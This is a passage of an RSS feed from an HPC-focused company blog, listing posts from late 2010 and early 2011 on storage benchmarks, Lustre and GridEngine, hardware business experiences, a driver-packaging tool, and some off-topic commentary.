      <description>We&amp;rsquo;ve been busy. Real busy. Did I mention we&amp;rsquo;ve been busy? Once the website rolls, please, by all means, let us know if somethings broke. Email works. Hopefully we won&amp;rsquo;t melt the server &amp;hellip; [Update] Doug rocks. In case I didn&amp;rsquo;t mention it. He rocks! Sites up with minor breakage (modulo grammar, inconsistent numbers &amp;hellip; ) May need a site breakage bounty. Gonna think about this &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Day job PR: JRTI and Scalable Informatics Form Strategic Partnership</title>
      <link>https://blog.scalability.org/2011/01/day-job-pr-jrti-and-scalable-informatics-form-strategic-partnership/</link>
      <pubDate>Wed, 19 Jan 2011 04:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/day-job-pr-jrti-and-scalable-informatics-form-strategic-partnership/</guid>
      <description>Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
 JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU &amp;amp; GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.</description>
    </item>
    
    <item>
      <title>This is good news</title>
      <link>https://blog.scalability.org/2011/01/this-is-good-news/</link>
      <pubDate>Tue, 18 Jan 2011 15:12:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/this-is-good-news/</guid>
      <description>Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah &amp;hellip; I am comfortable with this.</description>
    </item>
    
    <item>
      <title>Call it what it is</title>
      <link>https://blog.scalability.org/2011/01/call-it-what-it-is/</link>
      <pubDate>Sat, 15 Jan 2011 05:07:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/call-it-what-it-is/</guid>
      <description>Saw this on /.
Paraphrasing Shakespeare, a fork by any other name &amp;hellip; Look &amp;hellip; I appreciate that no one wants to call this a fork. Oracle has seemingly abandoned the project and is shopping ownership of the IP around. The choices ahead of the community are find someone to buy the IP, and rally to their leadership, ignore the IP, rename the project and fork it. You could always pretend that the IP isn&amp;rsquo;t an issue, that no fork is needed, and then have to do some serious rhetorical contortions to explain why your release isn&amp;rsquo;t a fork.</description>
    </item>
    
    <item>
      <title>Interesting poll on Lustre futures</title>
      <link>https://blog.scalability.org/2011/01/interesting-poll-on-lustre-futures/</link>
      <pubDate>Fri, 14 Jan 2011 21:38:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-poll-on-lustre-futures/</guid>
      <description>See here on LinkedIn. In case you can&amp;rsquo;t see it, the premise of the question is &amp;ldquo;Would you buy storage based on Lustre&amp;rdquo;, and it specifically points to Rich B&amp;rsquo;s article at InsideHPC. Choices are
 Yes, still Lustre No, I&amp;rsquo;d choose Panasas No, I&amp;rsquo;d choose GPFS No, I&amp;rsquo;d choose Gluster No, another solution  Its a small, self selecting, and probably badly biased sample, but whats interesting is that about 20% each seem like they would choose Lustre, Panasas, or another solution and about 40% would choose GPFS, with no one choosing Gluster.</description>
    </item>
    
    <item>
      <title>Its nice to see people seeing what we&#39;ve been predicting</title>
      <link>https://blog.scalability.org/2011/01/its-nice-to-see-people-seeing-what-weve-been-predicting/</link>
      <pubDate>Fri, 14 Jan 2011 16:39:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/its-nice-to-see-people-seeing-what-weve-been-predicting/</guid>
      <description>I could pat my own back on this &amp;hellip; no really, I could. Wouldn&amp;rsquo;t be hard. I&amp;rsquo;ve been talking for a long time about how the HPC market will likely evolve. Hidden within this is how to grow as a business &amp;hellip; serving this need. We&amp;rsquo;ve been predicting that the cloud HPC model will reduce the number of new clusters deployed. Basically, acquisition costs for running a cluster are large, as well as the lifetime costs.</description>
    </item>
    
    <item>
      <title>OT: Ouch !</title>
      <link>https://blog.scalability.org/2011/01/ot-ouch/</link>
      <pubDate>Wed, 12 Jan 2011 14:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/ot-ouch/</guid>
      <description>Not that cnbc is the bastion of correct/reliable/accurate reporting, but this article definitely hurts. The &amp;ldquo;American dream&amp;rdquo; has been to own your own house. We bought ours 13 years ago, with a 30 year mortgage. Refinanced 6 years ago to a 20 year mortgage, with the same payments. We assumed the value of the house would be increasing or at worst, staying the same. Last I checked on a few real estate sites, we are &amp;ldquo;underwater or upside-down&amp;rdquo; on the mortgage.</description>
    </item>
    
    <item>
      <title>Worth asking again ... does Lustre have a future?</title>
      <link>https://blog.scalability.org/2011/01/worth-asking-again-does-lustre-have-a-future/</link>
      <pubDate>Wed, 12 Jan 2011 06:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/worth-asking-again-does-lustre-have-a-future/</guid>
      <description>This is going to sound like a strange question to ask. Yes &amp;hellip; I know it is a strange question to ask given the events of the past few months. A long while ago, I postulated that Lustre&amp;rsquo;s future was (no pun intended) cloudy at best. That Sun/Oracle had an uncertain level of commitment to it, and Larry Ellison is a business man, and doesn&amp;rsquo;t run a charity &amp;hellip; there aren&amp;rsquo;t any freebees he is likely to fund forever.</description>
    </item>
    
    <item>
      <title>I had read it right ...</title>
      <link>https://blog.scalability.org/2011/01/i-had-read-it-right/</link>
      <pubDate>Wed, 12 Jan 2011 05:52:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/i-had-read-it-right/</guid>
      <description>A partner was working with us on an opportunity. At some point in the process, the customer tripped my alarms. This was going well into 2x4 material (e.g. our proposal wasn&amp;rsquo;t going to be seriously considered). I shared my thoughts with the partner. They wanted to press ahead. Sure enough, we got word of our 2x4-ness today. Nice to know we helped a customer beat a competitor up. Well, no, not really.</description>
    </item>
    
    <item>
      <title>Some nice announcements coming out next week</title>
      <link>https://blog.scalability.org/2011/01/some-nice-announcements-coming-out-next-week/</link>
      <pubDate>Fri, 07 Jan 2011 18:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/some-nice-announcements-coming-out-next-week/</guid>
      <description>from the $day job. Stay tuned.</description>
    </item>
    
    <item>
      <title>The bandwidth wall: aka a 19.2 TB write sprint; how fast can your storage do it?</title>
      <link>https://blog.scalability.org/2011/01/the-bandwidth-wall-aka-a-19-2-tb-write-sprint-how-fast-can-your-storage-do-it/</link>
      <pubDate>Fri, 07 Jan 2011 18:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/the-bandwidth-wall-aka-a-19-2-tb-write-sprint-how-fast-can-your-storage-do-it/</guid>
      <description>[root@jr5-lab ~]# fio sw.fio Run status group 0 (all jobs): WRITE: io=19,200GB, aggrb=2,323MB/s, minb=2,379MB/s, maxb=2,379MB/s, mint=8463222msec, maxt=8463222msec  Thats 8463.2 seconds to you and me. 2.351 hours. 8.17TB/hour And we didn&amp;rsquo;t even fill the unit up. This is what we mean by a low bandwidth wall. You can conceivably read/write the entire storage in a time comparable to single hours. If your platform can&amp;rsquo;t handle this (and most can&amp;rsquo;t), then you have a very high wall erected between you and your data.</description>
    </item>
    
    <item>
      <title>Lab JR5 quickie benchmarks</title>
      <link>https://blog.scalability.org/2011/01/lab-jr5-quickie-benchmarks/</link>
      <pubDate>Fri, 07 Jan 2011 15:32:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/lab-jr5-quickie-benchmarks/</guid>
      <description>I&amp;rsquo;ve seen some clustered file system results a few months ago where the vendor was happy to sustain something like 1.4 GB/s during their IO operations, and called this good. Something like 60 disks. Lustre, and some other bits. Their approach (and most people&amp;rsquo;s approach) in this space is to start with a bunch of demonstratably slow servers/disks, and aggregate them. Which eventually gets you to the performance you are looking for, albeit with low performance density, large expenditure of capital, large investment in space/power/cooling.</description>
    </item>
    
    <item>
      <title>Interesting (re)entre into the deskside/server side</title>
      <link>https://blog.scalability.org/2011/01/interesting-reentre-into-the-desksideserver-side/</link>
      <pubDate>Wed, 05 Jan 2011 23:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-reentre-into-the-desksideserver-side/</guid>
      <description>I had expected NVidia to do something. AMD and Fusion. Intel with AVX(Larabee, et al.) and integrated video. NVidia had to either develop its own processor, buy a design/company, or fight a battle in the future it would likely lose &amp;hellip; not due to the quality of the competitors or their parts, but simply because the deck was stacked against it. Their direction is interesting. Going ARM and a fusion like thing as a CPU + GPU (though I doubt they will call it an APU &amp;hellip; they are all about the APU &amp;hellip; where A==G).</description>
    </item>
    
    <item>
      <title>As good as my 2x4 detector is, it&#39;s still not perfect</title>
      <link>https://blog.scalability.org/2011/01/as-good-as-my-2x4-detector-is-its-still-not-perfect/</link>
      <pubDate>Wed, 05 Jan 2011 20:57:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/as-good-as-my-2x4-detector-is-its-still-not-perfect/</guid>
      <description>We don&amp;rsquo;t like being used as a 2x4 (two-by-four) &amp;hellip; basically a heavy chunk of wood used to beat someone into submission. Some of the surest signs of 2x4-dom are when we are asked for an onsite loaner. The theory behind this is supposed to be that a customer will evaluate a unit in their environment, give it a rigorous going over, and then make a purchase decision based upon that.</description>
    </item>
    
    <item>
      <title>Churchillian thoughts .... about grub</title>
      <link>https://blog.scalability.org/2011/01/churchillian-thoughts-about-grub/</link>
      <pubDate>Wed, 05 Jan 2011 19:27:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/churchillian-thoughts-about-grub/</guid>
      <description>Ahh &amp;hellip; grub. That boot loader. The one that &amp;hellip; after interacting with &amp;hellip; you wish you didn&amp;rsquo;t have to. Just had some fun a few minutes ago on a Lustre upgrade. Some of the grub tools are slightly broken, many are horribly, irretrievably borked. And they will do bad things to you. To your disk. Paraphrasing Churchill, grub is the worst bootloader, except for all the rest. I&amp;rsquo;ll argue that its marginally better than lilo.</description>
    </item>
    
    <item>
      <title>Projects for the new year ...</title>
      <link>https://blog.scalability.org/2011/01/projects-for-the-new-year/</link>
      <pubDate>Wed, 05 Jan 2011 12:52:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/projects-for-the-new-year/</guid>
      <description>Some near term &amp;hellip; some far term. Pragmatic projects:
 Dust. Almost to the point where I am happy releasing it. Will have ~6 driver packs, a spec, a user tool, and a roadmap when I am done. Think of it as a DKMS that works, and what it could have been. Lustre. We have operational Lustre builds from the git tree, though these are 2.x builds, and not 1.8.x builds.</description>
    </item>
    
    <item>
      <title>Goodbye GridEngine ...</title>
      <link>https://blog.scalability.org/2011/01/goodbye-gridengine/</link>
      <pubDate>Mon, 03 Jan 2011 22:41:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/goodbye-gridengine/</guid>
      <description>Well, sort of. Its morphed, into something not quite open source, with not enough of a community around it to sustain it from a development sense, as the corporate owner goes their own direction. I understand their decision, and I respect it &amp;hellip; its their (Oracle&amp;rsquo;s) IP. I don&amp;rsquo;t have to like it though. So we are migrating our internal queueing to Torque for the moment. Thinking about Slurm. Basically all of this will be hidden behind some of our tools, but still &amp;hellip; we&amp;rsquo;ve been using SGE since before it was Sun&amp;rsquo;s (or Grid Engine).</description>
    </item>
    
    <item>
      <title>Changing commenting</title>
      <link>https://blog.scalability.org/2010/12/changing-commenting/</link>
      <pubDate>Thu, 30 Dec 2010 18:48:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/changing-commenting/</guid>
      <description>Quick note: Spammers are attempting to abuse the system, so I am implementing some measures to reduce this.</description>
    </item>
    
    <item>
      <title>OT: Watching &#34;The empire strikes back&#34; and wondering if Vader meant this ...</title>
      <link>https://blog.scalability.org/2010/12/ot-watching-the-empire-strikes-back-and-wondering-if-vader-meant-this/</link>
      <pubDate>Sat, 25 Dec 2010 20:07:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-watching-the-empire-strikes-back-and-wondering-if-vader-meant-this/</guid>
      <description>Google your feelings Luke &amp;hellip;
[ ](http://scalability.org/images/search_your_feelings_Luke.png)
The HPC tie in was the significant use of some computing power for rendering by George Lucas and company to provide some of the special effects. Aside from this, I am sure Vader didn&amp;rsquo;t mean &amp;ldquo;google your feelings, Luke&amp;rdquo; &amp;hellip;</description>
    </item>
    
    <item>
      <title>OT: As if the previous attacks on the NSF weren&#39;t enough ...</title>
      <link>https://blog.scalability.org/2010/12/ot-as-if-the-previous-attacks-on-the-nsf-werent-enough/</link>
      <pubDate>Fri, 24 Dec 2010 14:05:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-as-if-the-previous-attacks-on-the-nsf-werent-enough/</guid>
      <description>There is this. The problem is, fundamentally, any program requesting money from the government becomes a political football. So the NSF or NIH programs are open to scrutiny. That part is fine. Pulling lawyer tricks to selectively (mis)quote? Not so fine. Its bad enough when AGW activists incorrectly opine that the science is settled, and make a mockery of those with the temerity to question the &amp;ldquo;settled&amp;rdquo; science. Its just as bad when the partisans in government misuse grant information to attack small programs as being wasteful, without a deeper understanding of the context and value of these programs.</description>
    </item>
    
    <item>
      <title>OT: faux-curity gone horribly awry</title>
      <link>https://blog.scalability.org/2010/12/ot-faux-curity-gone-horribly-awry/</link>
      <pubDate>Fri, 24 Dec 2010 13:51:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-faux-curity-gone-horribly-awry/</guid>
      <description>Call this, &amp;ldquo;shooting the messenger&amp;rdquo;. Call this, pointing out glaring flaws. Call this &amp;hellip; well &amp;hellip; for what it is &amp;hellip; disgusting. It begs the question whether or not this is the US, or the USSR. Don&amp;rsquo;t anger the government by pointing out the flaws in one of their systems. There&amp;rsquo;s a series of ironic humor jokes, ones that aren&amp;rsquo;t that funny, but more ominous, that start out &amp;ldquo;In Soviet Union, &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Wondering out loud here ... bear with me</title>
      <link>https://blog.scalability.org/2010/12/wondering-out-loud-here-bear-with-me/</link>
      <pubDate>Thu, 23 Dec 2010 04:45:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/wondering-out-loud-here-bear-with-me/</guid>
      <description>After the last post on Atrato, I am thinking that VC money might be better invested in proven real businesses. Those that have survived a number of years, though hardship and through growth. There is less risk there. Ok, the VC model is fundamentally built upon taking a risk on a company. As the spate of failures in (many) markets shows, rewards are far and few between, while risks aren&amp;rsquo;t seemingly ameliorated by what the VCs do.</description>
    </item>
    
    <item>
      <title>... and Atrato goes under</title>
      <link>https://blog.scalability.org/2010/12/and-atrato-goes-under/</link>
      <pubDate>Thu, 23 Dec 2010 03:27:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/and-atrato-goes-under/</guid>
      <description>Who, you might ask, is Atrato? A few years ago, they were pushing some sealed units that did &amp;ldquo;self healing&amp;rdquo;. That is, you never had to replace hard disks. They had some nice features, some venture money. What they never really got was traction. The concept was interesting, but as with all sealed and extremely proprietary designs, they weren&amp;rsquo;t able to convert their supposed advantages into sales. This can happen for many reasons.</description>
    </item>
    
    <item>
      <title>Saying &#34;no&#34;</title>
      <link>https://blog.scalability.org/2010/12/saying-no/</link>
      <pubDate>Wed, 22 Dec 2010 00:36:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/saying-no/</guid>
      <description>Sometimes the sales process delves into the ridiculous. This is when the value proposition has failed, and the customer starts asking for bill of materials. Imagine if you will, apart from the ingredients listed on a package of food, you asked the vendor of said food to describe the exact amounts, the source of each (brand, sku or part number, &amp;hellip;), the make and model of your oven, the make and model of everything you will use in the preparation of said food.</description>
    </item>
    
    <item>
      <title>Advantages of Michigan USA for HPC (and data centers)</title>
      <link>https://blog.scalability.org/2010/12/advantages-of-michigan-usa-for-hpc-and-data-centers/</link>
      <pubDate>Tue, 21 Dec 2010 23:14:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/advantages-of-michigan-usa-for-hpc-and-data-centers/</guid>
      <description>itssssss freaking cccccoooolllddddd Open the doors, let the outdoor air in. Our heater is running in the lab (large warehouse-like space). Can&amp;rsquo;t wait to start running the 5 ton AC unit next year. Right now, we have natural AC. Seriously &amp;hellip; nice area for many reasons (low costs all around), and with some cleverness in the cooling/heating work, you could significantly reduce overall yearly heating/cooling costs &amp;hellip;</description>
    </item>
    
    <item>
      <title>should give everyone pause, and force a serious consideration of the risks of cloud and hosting</title>
      <link>https://blog.scalability.org/2010/12/should-give-everyone-pause-and-force-a-serious-consideration-of-the-risks-of-cloud-and-hosting/</link>
      <pubDate>Mon, 20 Dec 2010 14:23:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/should-give-everyone-pause-and-force-a-serious-consideration-of-the-risks-of-cloud-and-hosting/</guid>
      <description>See this article. Yes, this deals with a hosting data center, but notice that some of the companies swept up in the sting&amp;rsquo;s removal of machines, had &amp;ldquo;cloud&amp;rdquo; projects of varying types. This gets to risk of hosting or projecting important aspects into the cloud. I am not saying &amp;ldquo;don&amp;rsquo;t do it.&amp;rdquo; On the contrary, I&amp;rsquo;d say make sure you have a backup of your data and functions in such a way that you can trivially switch between services.</description>
    </item>
    
    <item>
      <title>I wish cloning were legal in Michigan ... and wish it worked ...</title>
      <link>https://blog.scalability.org/2010/12/i-wish-cloning-were-legal-in-michigan-and-wish-it-worked/</link>
      <pubDate>Mon, 20 Dec 2010 07:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/i-wish-cloning-were-legal-in-michigan-and-wish-it-worked/</guid>
      <description>To code or not to code &amp;hellip; that is the question. Seriously &amp;hellip; my time is a zero sum game. I can&amp;rsquo;t run as many threads on my CPU as I wish &amp;hellip; its hard to code and debug and sell and service all at once. Gonna have to get some hiring going. Or some cloning. Gaak &amp;hellip;</description>
    </item>
    
    <item>
      <title>How to deliver an application to end users which depends upon things they don&#39;t have</title>
      <link>https://blog.scalability.org/2010/12/how-to-deliver-an-application-to-end-users-which-depends-upon-things-they-dont-have/</link>
      <pubDate>Mon, 20 Dec 2010 02:22:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/how-to-deliver-an-application-to-end-users-which-depends-upon-things-they-dont-have/</guid>
      <description>This is the question I have for dust. Almost ready for initial release. Fixed most everything, and the one thing we are &amp;ldquo;punting&amp;rdquo; on is actually less being punted and more being worked around until we can get a better solution in place. The spec&amp;rsquo;s for it will be on the site too soon. Ok &amp;hellip; so assume a pure Redhat or Centos system (will work with others as well) for the moment.</description>
    </item>
    
    <item>
      <title>Computer terms applied to ... er ... other devices</title>
      <link>https://blog.scalability.org/2010/12/computer-terms-applied-to-er-other-devices/</link>
      <pubDate>Mon, 20 Dec 2010 01:24:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/computer-terms-applied-to-er-other-devices/</guid>
      <description>Saw a link to this at troglopundit after hearing that the Detroit Lions had somehow miraculously, won another game. Restore the roar
[ ](http://troglopundit.wordpress.com/about/computertechnology/)
Heh! (don&amp;rsquo;t know if I agree with the reading material on the lower left &amp;hellip; we have lots of kids books, fiction, histories, and other as our &amp;ldquo;supplementary data&amp;rdquo; &amp;hellip; to each their own). Follow the link (if you dare) by clicking on the image. This will take you to the page it was on (where I found it linked from after the search), where they have the Zombie food group.</description>
    </item>
    
    <item>
      <title>OT:  A good concept with a really bad initial approach</title>
      <link>https://blog.scalability.org/2010/12/ot-a-good-concept-with-a-really-bad-initial-approach/</link>
      <pubDate>Sat, 18 Dec 2010 16:16:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-a-good-concept-with-a-really-bad-initial-approach/</guid>
      <description>See this. The concept, review programs for something potentially wasteful, is great. Thats wonderful. Looks like @GOPWhip was busy getting concepts together. Whats really bad about this? It starts out targetting the NSF, which is a miniscule &amp;hellip; tiny &amp;hellip; fraction of the federal budget, and one of the only aspects of the federal budget that has a net ROI. We get positive impact from this investment. Which apart from the NIH and a few other programs, we don&amp;rsquo;t get in general from government expenditure.</description>
    </item>
    
    <item>
      <title>I have to admit ... the hardest thing about this business is getting closure</title>
      <link>https://blog.scalability.org/2010/12/i-have-to-admit-the-hardest-thing-about-this-business-is-getting-closure/</link>
      <pubDate>Fri, 17 Dec 2010 18:07:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/i-have-to-admit-the-hardest-thing-about-this-business-is-getting-closure/</guid>
      <description>This is more of a business general issue than an HPC business issue per se. We have lots of conversations with customers. We do lots of RFP responses. And we win some and we lose some. But the thing I find hardest to deal with are potential customers going mute for long durations. Maybe there is nothing to report, maybe people don&amp;rsquo;t want to speak after making their decisions. Whatever the reason.</description>
    </item>
    
    <item>
      <title>OT: Faux-security</title>
      <link>https://blog.scalability.org/2010/12/ot-faux-security/</link>
      <pubDate>Fri, 17 Dec 2010 17:19:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-faux-security/</guid>
      <description>Sigh. money quote
Yeah, these are older data, but the problem is &amp;hellip;
The Walmartization of security. and then
So &amp;hellip; they seem to have not noticed that these new techniques and machines &amp;hellip; don&amp;rsquo;t really help. Our tax dollars at work.</description>
    </item>
    
    <item>
      <title>HPC sales viewed in the context of watching a horror show ...</title>
      <link>https://blog.scalability.org/2010/12/hpc-sales-as-a-participant-in-a-horror-show/</link>
      <pubDate>Wed, 15 Dec 2010 22:08:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/hpc-sales-as-a-participant-in-a-horror-show/</guid>
      <description>So we have a number of customers looking at particular configurations. Like many others, they get quotes from all over. Including from companies that don&amp;rsquo;t really have the slightest clue about what is being asked of them. Which means, we as often as not, get quotes tossed back to us with a note saying &amp;ldquo;you are at too high a price&amp;rdquo;. While the quotes they are comparing to aren&amp;rsquo;t even meeting the basic spec.</description>
    </item>
    
    <item>
      <title>OT:  disappointed with the firewall distros I&#39;ve looked at</title>
      <link>https://blog.scalability.org/2010/12/ot-disappointed-with-the-firewall-distros-ive-looked-at/</link>
      <pubDate>Wed, 15 Dec 2010 20:40:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-disappointed-with-the-firewall-distros-ive-looked-at/</guid>
      <description>We&amp;rsquo;ve been looking at building a gateway/firewall machine, with load balancing, failover, and many other nice features. For security purposes, we&amp;rsquo;ve wanted to run it in a very particular way. All the distributions we&amp;rsquo;ve tried: clearOS, Vyatta, Endian, IPFire, Zentyal &amp;hellip; all of them &amp;hellip; sorta &amp;hellip; kinda &amp;hellip; did what we wanted. Sorta. Kinda. But not quite.
ClearOS never worked. I mean it installed, configured, but it could never pass packets correctly.</description>
    </item>
    
    <item>
      <title>JR4/DV4 design change</title>
      <link>https://blog.scalability.org/2010/12/jr4dv4-design-change/</link>
      <pubDate>Wed, 15 Dec 2010 14:58:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/jr4dv4-design-change/</guid>
      <description>Basically we have changed the chassis we use to one providing better cooling, and better OS drive access. In the case of the JR4, we should have better backplane fault isolation, at the cost of a few more wires to deal with internally (e.g. shouldn&amp;rsquo;t impact customers at all). Costs will be about the same, but serviceability will be easier. All fans are hot swappable, as are power supplies, and disks, including OS drives.</description>
    </item>
    
    <item>
      <title>Treating partnerships as business investments</title>
      <link>https://blog.scalability.org/2010/12/treating-partnerships-as-business-investments/</link>
      <pubDate>Mon, 13 Dec 2010 21:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/treating-partnerships-as-business-investments/</guid>
      <description>We&amp;rsquo;ve had issues in the past with &amp;lsquo;partners&amp;rsquo; taking advantage of our willingness to work with them, in order to have everyone come out ahead &amp;hellip; the customer, the partner, and us. This approach to partnership means all sacrifice a little, but everyone wins. Unfortunately, it also requires that everyone behave in an honest manner, honor their agreements. We are treating all discount requests as a partnership request. A customer wants a lower price on something.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Dell grabs Compellent</title>
      <link>https://blog.scalability.org/2010/12/ma-dell-grabs-compellent/</link>
      <pubDate>Mon, 13 Dec 2010 20:10:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ma-dell-grabs-compellent/</guid>
      <description>I had an inkling that this might come to be. Compellent makes filer heads that connect to storage arrays on the back end. Units are thin provisioned with lots of tiering and migration bits built in. Compellent isn&amp;rsquo;t an HPC play. Really they are more an enterprise-y type of play. I do know a few Compellent people (hi Russ!), and the products will fill a hole in the Dell line. However, there are still other holes to fill, so I expect Dell to continue down its M&amp;amp;A; path.</description>
    </item>
    
    <item>
      <title>fixing a few bugs in dust before release</title>
      <link>https://blog.scalability.org/2010/12/fixing-a-few-bugs-in-dust-before-release/</link>
      <pubDate>Mon, 13 Dec 2010 05:36:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/fixing-a-few-bugs-in-dust-before-release/</guid>
      <description>Hit a corner case that resulted in a strange DB entry. Fixing that, and the installation initrd, and the initramfs/initrd build. Expect to release tomorrow.</description>
    </item>
    
    <item>
      <title>Added some bandwidth to main site</title>
      <link>https://blog.scalability.org/2010/12/added-some-bandwidth-to-main-site/</link>
      <pubDate>Sun, 12 Dec 2010 17:04:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/added-some-bandwidth-to-main-site/</guid>
      <description>We just updated our company internet connection. About 3.5x better download speed, about 6x better upload speed. Its on a multi-wan router, with second different technology path being slower and less expensive, but with a 5 second cutover. Something bad happens to one path, the other takes over. This happens seamlessly, most users won&amp;rsquo;t notice this as DNS is roundrobin&amp;rsquo;ed. This said, our multi-wan router is now a bottleneck. I&amp;rsquo;ve been looking at replacing it with either a faster appliance machine based multi-wan router, or a small Delta-V unit with enough NICs.</description>
    </item>
    
    <item>
      <title>Docs wiki back up</title>
      <link>https://blog.scalability.org/2010/12/docs-wiki-back-up/</link>
      <pubDate>Sun, 12 Dec 2010 16:49:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/docs-wiki-back-up/</guid>
      <description>That was annoying. The update/upgrade path effectively wrote over the old configs without telling me. Snapshot script is up, and we will set up for weekly snapshots, and then deletion of the same after 12 weeks. Did I mention that this was annoying? On another note, we&amp;rsquo;ve had requests to refine/update the documentation, and we are doing that now. This is a work in progress, always will be, but we expect the docs to get much better in short order.</description>
    </item>
    
    <item>
      <title>rethinking the documentation wiki underpinnings</title>
      <link>https://blog.scalability.org/2010/12/rethinking-the-documentation-wiki-underpinnings/</link>
      <pubDate>Thu, 09 Dec 2010 03:54:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/rethinking-the-documentation-wiki-underpinnings/</guid>
      <description>We updated the documentation server last week, and the wiki software, updated by the folks who write it, broke. I&amp;rsquo;ll try a few more things to fix it tomorrow/friday, but at some point I have to question my choice of wiki software. If the open source version breaks like this with a simple yum update, I don&amp;rsquo;t have much faith that the closed source variant with more features won&amp;rsquo;t break. So I am looking into foundation/large group led efforts.</description>
    </item>
    
    <item>
      <title>back from my Texas trek and assorted bits</title>
      <link>https://blog.scalability.org/2010/12/back-from-my-texas-trek-and-assorted-bits/</link>
      <pubDate>Thu, 09 Dec 2010 03:39:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/back-from-my-texas-trek-and-assorted-bits/</guid>
      <description>Was in Dallas, College Station, and then Austin. I am starting to get concerned that hosting providers may not have the capability to work on machines beyond the level of popping out failed disks and replacing them. They appear to not be able to provide the level of service that our customer assured us that they could provide. Went down there and saw some terrible things done to some power connectors.</description>
    </item>
    
    <item>
      <title>dust just built and installed its first module, successfully, without issue</title>
      <link>https://blog.scalability.org/2010/12/dust-just-built-and-installed-its-first-module-successfully-without-issue/</link>
      <pubDate>Sat, 04 Dec 2010 22:20:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/dust-just-built-and-installed-its-first-module-successfully-without-issue/</guid>
      <description>A few more things to do &amp;hellip; we need a &amp;ldquo;make clean&amp;rdquo; like thing, and maybe a &amp;ldquo;make prepare&amp;rdquo; like thing. And we need to trigger a mkinitrd at the end when requested. Major things are the init.d script, but all it does is call a
Yeah, we are trying to make this really simple. Really really simple. And make sure it works. Really works. Here is output with the &amp;ndash;generate and &amp;ndash;debug options.</description>
    </item>
    
    <item>
      <title>OT [Economy]: So what should we think about this?</title>
      <link>https://blog.scalability.org/2010/12/ot-economy-so-what-should-we-think-about-this/</link>
      <pubDate>Sat, 04 Dec 2010 17:38:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-economy-so-what-should-we-think-about-this/</guid>
      <description>I saw this today linked from DrudgeReport. In it we see a graph of auto company financing arms borrowing from the US Federal reserve. These are lending institutions. During the credit crisis (and I&amp;rsquo;ll argue now as well), credit dried up. Banks wouldn&amp;rsquo;t loan money. We ran into this ourselves a number of times. Required some creative action on our part. Not everyone was so lucky. But we are small, and not impacting a big part of the economy.</description>
    </item>
    
    <item>
      <title>Where we&#39;ve been and where we are going</title>
      <link>https://blog.scalability.org/2010/12/where-weve-been-and-where-we-are-going/</link>
      <pubDate>Sat, 04 Dec 2010 16:22:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/where-weve-been-and-where-we-are-going/</guid>
      <description>Last year around this time, I wrote a long set of posts on HPC in the first decade of the millenium. Posts start here (there are 7). I am gathering some of my thoughts together for an article. Its been an interesting year, with changes coming in both continuous and discontinuous (creative destructive) manners. We do live in interesting times, and I&amp;rsquo;ll try to detail what directions I see us going in.</description>
    </item>
    
    <item>
      <title>Are expectations being set properly?</title>
      <link>https://blog.scalability.org/2010/12/are-expectations-being-set-properly/</link>
